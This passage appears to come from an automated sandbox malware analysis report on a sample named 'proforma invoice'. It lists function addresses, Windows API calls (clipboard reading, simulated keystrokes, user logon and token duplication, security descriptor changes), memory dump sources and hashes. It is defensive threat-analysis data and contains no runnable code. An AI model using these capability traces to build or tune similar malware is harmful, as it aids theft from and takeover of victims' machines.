                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 908829b0fb1578d54401bbf33ee1720c5b4b01424c425976315b94ec59f1af7c
                  • Instruction ID: f845c86e8c1934b12e96035688e35e3916f09f8a69d03b5201df9c8c3128ef4b
                  • Opcode Fuzzy Hash: 908829b0fb1578d54401bbf33ee1720c5b4b01424c425976315b94ec59f1af7c
                  • Instruction Fuzzy Hash: 07D06C3204010DBBDF028F84DD06EDA3FAAFB48714F114000BE1866020C732E821AB90
                  Function 00AA1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00AA1CBC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: InfoParametersSystem
                  • String ID:
                  • API String ID: 3098949447-0
                  • Opcode ID: 01e04103b0430eb3caf0b9a53bff138f0434bec4598adbbc6bf810ef060ad66e
                  • Instruction ID: 8720f885e7cd71d50e61e5c20b9157f88388f31130a3ee6091befd761ad90927
                  • Opcode Fuzzy Hash: 01e04103b0430eb3caf0b9a53bff138f0434bec4598adbbc6bf810ef060ad66e
                  • Instruction Fuzzy Hash: A4C09B36280304EFF31447D4BC4BF147754A358B00F154401F64D675E3CBA11450D764
                  Function 00ABFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                  • Instruction ID: f7cf4c0e8a82f5c67458d0953ad8326780d133e518f8cfcf0aa214bd9f28af50
                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                  • Instruction Fuzzy Hash: DE31D375A00109DFC718CF59D880AA9FBB9FF4A304B2886A5E809CB656D731EDC1DBC0
                  Function 0210229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                  Download Yara Rule
                  APIs
                  • Sleep.KERNELBASE(000001F4), ref: 021022B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655323945.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2100000_proforma invoice.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                  • Instruction ID: b420030de45642c0f898338885bab7ff4c7585b4920d1119353d642fb3c9b088
                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                  • Instruction Fuzzy Hash: D1E09A7498010EAFDB00EFE4D54969E7BB4EF04311F1005A1FD0597680DB709A548A62
                  Function 021022A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                  Download Yara Rule
                  APIs
                  • Sleep.KERNELBASE(000001F4), ref: 021022B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1655323945.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2100000_proforma invoice.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                  • Instruction ID: 42ec7e2db2a4cfccc4f1562f594a82c6175d67c6d38aabc1a6ddf7c51e89cbbe
                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                  • Instruction Fuzzy Hash: FFE0BF7498010E9FDB00EFE4D54969E7BB4EF04301F100161FD0592280D77099508A62

                  Non-executed Functions

                  Function 00B39576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B3961A
                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B3965B
                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B3969F
                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B396C9
                  • SendMessageW.USER32 ref: 00B396F2
                  • GetKeyState.USER32(00000011), ref: 00B3978B
                  • GetKeyState.USER32(00000009), ref: 00B39798
                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B397AE
                  • GetKeyState.USER32(00000010), ref: 00B397B8
                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B397E9
                  • SendMessageW.USER32 ref: 00B39810
                  • SendMessageW.USER32(?,00001030,?,00B37E95), ref: 00B39918
                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B3992E
                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B39941
                  • SetCapture.USER32(?), ref: 00B3994A
                  • ClientToScreen.USER32(?,?), ref: 00B399AF
                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B399BC
                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B399D6
                  • ReleaseCapture.USER32 ref: 00B399E1
                  • GetCursorPos.USER32(?), ref: 00B39A19
                  • ScreenToClient.USER32(?,?), ref: 00B39A26
                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B39A80
                  • SendMessageW.USER32 ref: 00B39AAE
                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B39AEB
                  • SendMessageW.USER32 ref: 00B39B1A
                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B39B3B
                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B39B4A
                  • GetCursorPos.USER32(?), ref: 00B39B68
                  • ScreenToClient.USER32(?,?), ref: 00B39B75
                  • GetParent.USER32(?), ref: 00B39B93
                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B39BFA
                  • SendMessageW.USER32 ref: 00B39C2B
                  • ClientToScreen.USER32(?,?), ref: 00B39C84
                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B39CB4
                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B39CDE
                  • SendMessageW.USER32 ref: 00B39D01
                  • ClientToScreen.USER32(?,?), ref: 00B39D4E
                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B39D82
                    • Part of subcall function 00AB9944: GetWindowLongW.USER32(?,000000EB), ref: 00AB9952
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B39E05
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                  • String ID: @GUI_DRAGID$F
                  • API String ID: 3429851547-4164748364
                  • Opcode ID: 80ee514ff5d2a293b78d44dedbe9e60dd3d409b32e255038066a14ea020d42d7
                  • Instruction ID: dbb477afe34253343f62d149f19634092739e28b03276c2ccfd383f34802b72d
                  • Opcode Fuzzy Hash: 80ee514ff5d2a293b78d44dedbe9e60dd3d409b32e255038066a14ea020d42d7
                  • Instruction Fuzzy Hash: DE42BF35205200AFD724CF68CC85EAABBE5FF49310F204A99F699972A1DBB1EC51CF51
                  Function 00B34873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00B348F3
                  • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00B34908
                  • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00B34927
                  • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00B3494B
                  • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00B3495C
                  • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00B3497B
                  • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00B349AE
                  • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00B349D4
                  • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00B34A0F
                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00B34A56
                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00B34A7E
                  • IsMenu.USER32(?), ref: 00B34A97
                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B34AF2
                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B34B20
                  • GetWindowLongW.USER32(?,000000F0), ref: 00B34B94
                  • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00B34BE3
                  • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00B34C82
                  • wsprintfW.USER32 ref: 00B34CAE
                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B34CC9
                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00B34CF1
                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B34D13
                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B34D33
                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00B34D5A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                  • String ID: %d/%02d/%02d
                  • API String ID: 4054740463-328681919
                  • Opcode ID: f09330c4996a93b82a5ae56edee7b61fe4b908241a474e50bcd90c8bdedf4b02
                  • Instruction ID: b5613af745f495406dfbcc245f6b6b8cd2850b58f0ff1dca3ee4133fbdaf599e
                  • Opcode Fuzzy Hash: f09330c4996a93b82a5ae56edee7b61fe4b908241a474e50bcd90c8bdedf4b02
                  • Instruction Fuzzy Hash: F912D271500214AFEB258F68CC4AFAE7BF8EF45710F2441A9F519EB2E1DB74A941CB50
                  Function 00ABF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                  Download Yara Rule
                  APIs
                  • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00ABF998
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AFF474
                  • IsIconic.USER32(00000000), ref: 00AFF47D
                  • ShowWindow.USER32(00000000,00000009), ref: 00AFF48A
                  • SetForegroundWindow.USER32(00000000), ref: 00AFF494
                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AFF4AA
                  • GetCurrentThreadId.KERNEL32 ref: 00AFF4B1
                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AFF4BD
                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00AFF4CE
                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00AFF4D6
                  • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00AFF4DE
                  • SetForegroundWindow.USER32(00000000), ref: 00AFF4E1
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF4F6
                  • keybd_event.USER32(00000012,00000000), ref: 00AFF501
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF50B
                  • keybd_event.USER32(00000012,00000000), ref: 00AFF510
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF519
                  • keybd_event.USER32(00000012,00000000), ref: 00AFF51E
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF528
                  • keybd_event.USER32(00000012,00000000), ref: 00AFF52D
                  • SetForegroundWindow.USER32(00000000), ref: 00AFF530
                  • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00AFF557
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                  • String ID: Shell_TrayWnd
                  • API String ID: 4125248594-2988720461
                  • Opcode ID: c0270f82290bf691b284aa707ab20f76f54cbdea3540c201349bb9ca128c17a9
                  • Instruction ID: 1f49d933e0855748c16b2053f64349c035ccdba996537f1d856b694d5e4f887f
                  • Opcode Fuzzy Hash: c0270f82290bf691b284aa707ab20f76f54cbdea3540c201349bb9ca128c17a9
                  • Instruction Fuzzy Hash: 09310E71A80218BEEB216BF55C4AFBF7E6CEB44B50F210065FA01F7191CBB19D00AB60
                  Function 00B01201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B0170D
                    • Part of subcall function 00B016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B0173A
                    • Part of subcall function 00B016C3: GetLastError.KERNEL32 ref: 00B0174A
                  • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B01286
                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B012A8
                  • CloseHandle.KERNEL32(?), ref: 00B012B9
                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B012D1
                  • GetProcessWindowStation.USER32 ref: 00B012EA
                  • SetProcessWindowStation.USER32(00000000), ref: 00B012F4
                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B01310
                    • Part of subcall function 00B010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B011FC), ref: 00B010D4
                    • Part of subcall function 00B010BF: CloseHandle.KERNEL32(?,?,00B011FC), ref: 00B010E9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                  • String ID: $default$winsta0
                  • API String ID: 22674027-1027155976
                  • Opcode ID: 17cb2110982dc51862098ff6fb362006e160314a87a0bca3f37a9ed3d6136a92
                  • Instruction ID: 4ff99b4ba39a1565f44688b0a8d81fdc6e7f27989c8a3761d65021250e61f383
                  • Opcode Fuzzy Hash: 17cb2110982dc51862098ff6fb362006e160314a87a0bca3f37a9ed3d6136a92
                  • Instruction Fuzzy Hash: 0F817871900209AFDF259FA8DC49BEE7FB9EF04704F2445A9F910B62A0DB758954CF20
                  Function 00B00B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B01114
                    • Part of subcall function 00B010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01120
                    • Part of subcall function 00B010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B0112F
                    • Part of subcall function 00B010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01136
                    • Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B0114D
                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B00BCC
                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B00C00
                  • GetLengthSid.ADVAPI32(?), ref: 00B00C17
                  • GetAce.ADVAPI32(?,00000000,?), ref: 00B00C51
                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B00C6D
                  • GetLengthSid.ADVAPI32(?), ref: 00B00C84
                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B00C8C
                  • HeapAlloc.KERNEL32(00000000), ref: 00B00C93
                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B00CB4
                  • CopySid.ADVAPI32(00000000), ref: 00B00CBB
                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B00CEA
                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B00D0C
                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B00D1E
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00D45
                  • HeapFree.KERNEL32(00000000), ref: 00B00D4C
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00D55
                  • HeapFree.KERNEL32(00000000), ref: 00B00D5C
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00D65
                  • HeapFree.KERNEL32(00000000), ref: 00B00D6C
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B00D78
                  • HeapFree.KERNEL32(00000000), ref: 00B00D7F
                    • Part of subcall function 00B01193: GetProcessHeap.KERNEL32(00000008,00B00BB1,?,00000000,?,00B00BB1,?), ref: 00B011A1
                    • Part of subcall function 00B01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B00BB1,?), ref: 00B011A8
                    • Part of subcall function 00B01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B00BB1,?), ref: 00B011B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                  • String ID:
                  • API String ID: 4175595110-0
                  • Opcode ID: 6c086fd436f401391da3b03e2f24f3a93e8bc76d8cf2fb0146c78bb73aeb7e9e
                  • Instruction ID: 4d50d429bfe5d848da772d6910756e32481216c547c2c76bedaa8a53be175eac
                  • Opcode Fuzzy Hash: 6c086fd436f401391da3b03e2f24f3a93e8bc76d8cf2fb0146c78bb73aeb7e9e
                  • Instruction Fuzzy Hash: 3071397690020AABDF10AFE4DC44BAEBFB9FF04310F2446A5E915B7191DB75AA05CB70
                  Function 00B1EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                  Download Yara Rule
                  APIs
                  • OpenClipboard.USER32(00B3CC08), ref: 00B1EB29
                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B1EB37
                  • GetClipboardData.USER32(0000000D), ref: 00B1EB43
                  • CloseClipboard.USER32 ref: 00B1EB4F
                  • GlobalLock.KERNEL32(00000000), ref: 00B1EB87
                  • CloseClipboard.USER32 ref: 00B1EB91
                  • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00B1EBBC
                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00B1EBC9
                  • GetClipboardData.USER32(00000001), ref: 00B1EBD1
                  • GlobalLock.KERNEL32(00000000), ref: 00B1EBE2
                  • GlobalUnlock.KERNEL32(00000000,?), ref: 00B1EC22
                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 00B1EC38
                  • GetClipboardData.USER32(0000000F), ref: 00B1EC44
                  • GlobalLock.KERNEL32(00000000), ref: 00B1EC55
                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B1EC77
                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B1EC94
                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B1ECD2
                  • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00B1ECF3
                  • CountClipboardFormats.USER32 ref: 00B1ED14
                  • CloseClipboard.USER32 ref: 00B1ED59
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                  • String ID:
                  • API String ID: 420908878-0
                  • Opcode ID: 30540a1e97000d26b9cf4d8399301fdb681187a870e9d92c0f134023c57689cc
                  • Instruction ID: aef3357d39cd8f425e6bee8d968c6ef45379f779a1ad51d8b5c1c0a631f8285f
                  • Opcode Fuzzy Hash: 30540a1e97000d26b9cf4d8399301fdb681187a870e9d92c0f134023c57689cc
                  • Instruction Fuzzy Hash: F561D1352042019FD300EF64D889FAABBE4EF85714F58459DF866972A1CF31DD89CB62
                  Function 00B1698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(?,?), ref: 00B169BE
                  • FindClose.KERNEL32(00000000), ref: 00B16A12
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B16A4E
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B16A75
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B16AB2
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B16ADF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                  • API String ID: 3830820486-3289030164
                  • Opcode ID: 4028da5e048926e51d0734a6cae98245cad313ad8dbde8794ee842c8697122b6
                  • Instruction ID: 6f37de1d9cea6084673464be9431da94fbdbb62cb53a7e6ab5c1ebcc03f0c958
                  • Opcode Fuzzy Hash: 4028da5e048926e51d0734a6cae98245cad313ad8dbde8794ee842c8697122b6
                  • Instruction Fuzzy Hash: 19D14D72508300AEC714EBA4CD82EAFB7ECAF89704F44495DF589D7191EB74DA44CB62
                  Function 00B19642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B19663
                  • GetFileAttributesW.KERNEL32(?), ref: 00B196A1
                  • SetFileAttributesW.KERNEL32(?,?), ref: 00B196BB
                  • FindNextFileW.KERNEL32(00000000,?), ref: 00B196D3
                  • FindClose.KERNEL32(00000000), ref: 00B196DE
                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00B196FA
                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B1974A
                  • SetCurrentDirectoryW.KERNEL32(00B66B7C), ref: 00B19768
                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B19772
                  • FindClose.KERNEL32(00000000), ref: 00B1977F
                  • FindClose.KERNEL32(00000000), ref: 00B1978F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
